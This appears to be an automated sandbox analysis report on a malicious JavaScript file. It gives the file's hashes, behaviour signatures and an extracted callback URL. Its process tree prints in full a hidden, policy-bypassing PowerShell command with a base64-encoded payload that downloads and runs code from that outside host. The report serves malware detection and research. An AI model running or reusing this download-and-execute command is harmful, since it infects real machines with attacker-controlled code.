Analysis
max time kernel: 121s
max time network: 127s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
submitted: 07/01/2024, 19:21
Static task: static1
Behavioral task: behavioral1
  Sample: a6bcd682ec15292a0a8e3f841ae2bda5.js
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: a6bcd682ec15292a0a8e3f841ae2bda5.js
  Resource: win10v2004-20231215-en
General
Target: a6bcd682ec15292a0a8e3f841ae2bda5.js
Size: 86KB
MD5: a6bcd682ec15292a0a8e3f841ae2bda5
SHA1: 7f88854a04b4e35a693f7ca2fd1683672d5a829f
SHA256: 961b51cea408027213e56293d99a3bf7778bf95346eeca5cdf7c6f8d7a1f933f
SHA512: 4dd1a22a0aae362d606841ef67bf216234e241d080ef50bc25c21e47b8826f55750ae19971d04682f0096d17e513532c3b43016632df585d4e58fe149a3bea1e
SSDEEP: 1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oR:59Ry98guHVBqqg2bcruzUHmLKeMMU7GH
Malware Config
Extracted: http://smart-integrator.hr/pornhub.php
Signatures
- Blocklisted process makes network request (1 IoCs)
  flow  pid   Process
  3     2352  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2352  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2352  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   Process      procid_target
  PID 1396 wrote to memory of 2860  1396  wscript.exe  30
  PID 1396 wrote to memory of 2860  1396  wscript.exe  30
  PID 1396 wrote to memory of 2860  1396  wscript.exe  30
  PID 2860 wrote to memory of 2352  2860  cmd.exe      28
  PID 2860 wrote to memory of 2352  2860  cmd.exe      28
  PID 2860 wrote to memory of 2352  2860  cmd.exe      28
Processes
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\a6bcd682ec15292a0a8e3f841ae2bda5.js
  PID: 1396
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
    PID: 2860
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      PID: 2352
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken